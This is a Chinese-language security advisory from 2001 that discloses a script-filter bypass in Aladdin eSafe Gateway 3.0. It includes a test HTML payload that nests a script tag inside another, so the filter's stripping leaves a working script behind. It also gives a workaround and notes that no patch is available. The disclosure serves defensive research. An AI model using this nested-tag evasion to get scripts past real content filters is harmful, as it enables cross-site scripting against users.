首页 -> 安全研究

安全研究

安全漏洞
Aladdin eSafe Gateway 脚本过滤漏洞

发布日期:2001-05-22
更新日期:2001-05-22

受影响系统:

Aladdin eSafe Gateway vesrsion 3.0(或更低版本)
描述:


eSafe Gateway 3.0是一个基于内容过滤的安全产品。用户可以配置eSafe Gateway
来从进入的HTML文档中删除脚本(VBScripts, JavaScripts)和其他的可执行标记。

然而,通过特别构造HTML文件,攻击者可以轻易地绕过eSafe的脚本过滤机制。

<*来源:eDvice Security Services (support@edvicetech.com)
        主页地址: http://www.edvicetech.com
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


如果发送如下的HTML代码:
----------------------

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="JavaScript">
alert("hi");
</SCRIPT>
</BODY></HTML>

当上面的代码通过eSafe过滤引擎时,脚本将会被过滤,变成下列格式:

<HTML><HEAD></HEAD>
<BODY>

</BODY></HTML>

然而,如果我们使用下列代码:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT<script language="javascript"> </script> language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>

由于内部的脚本会被过滤,则最后剩下的是这样的代码:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>

这就产生了一个有效的脚本代码。



建议:

临时解决方法:

在此问题被修复之前不要依赖eSafe的过滤机制。

厂商补丁:

暂无

厂商主页地址:www.ealaddin.com


浏览次数:3904
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障